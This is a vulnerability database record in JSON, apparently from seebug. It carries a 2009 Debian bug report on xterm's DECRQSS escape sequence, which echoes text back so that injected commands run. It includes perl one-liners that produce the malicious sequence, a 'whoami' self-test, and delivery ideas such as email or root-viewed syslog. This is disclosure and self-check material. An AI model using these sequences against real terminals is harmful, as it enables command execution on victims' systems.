DATABASE RESOURCES PRICING ABOUT US

{"sourceData": "\n Package: xterm\r\nVersion: 222-1etch2\r\nSeverity: grave\r\nTags: security patch\r\nJustification: user security hole\r\n\r\n\r\nDECRQSS Device Control Request Status String "DCS $ q" simply echoes\r\n(responds with) invalid commands. For example,\r\nperl -e 'print "\\eP\\$q\\nbad-command\\n\\e\\\\"'\r\nwould run bad-command.\r\n\r\nExploitability is the same as for the "window title reporting" issue\r\nin DSA-380: include the DCS string in an email message to the victim,\r\nor arrange to have it in syslog to be viewed by root.\r\n\r\nOriginal:\r\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030\r\n\r\nTest:\r\n\r\nperl -e 'print "\\eP\\$q\\nwhoami\\n\\e\\\\"' > bla.log\r\ncat bla.log\r\n\r\nIf whoami gets executed you should update. \n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-10418", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-10418", "type": "seebug", "viewCount": 1, "references": [], "lastseen": "2017-11-19T19:02:17", "published": "2009-01-07T00:00:00", "cvelist": [], "id": "SSV:10418", "enchantments_done": [], "modified": "2009-01-07T00:00:00", "title": "Debian GNU/Linux XTERM (DECRQSS/comments) Weakness Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647640632}}

{}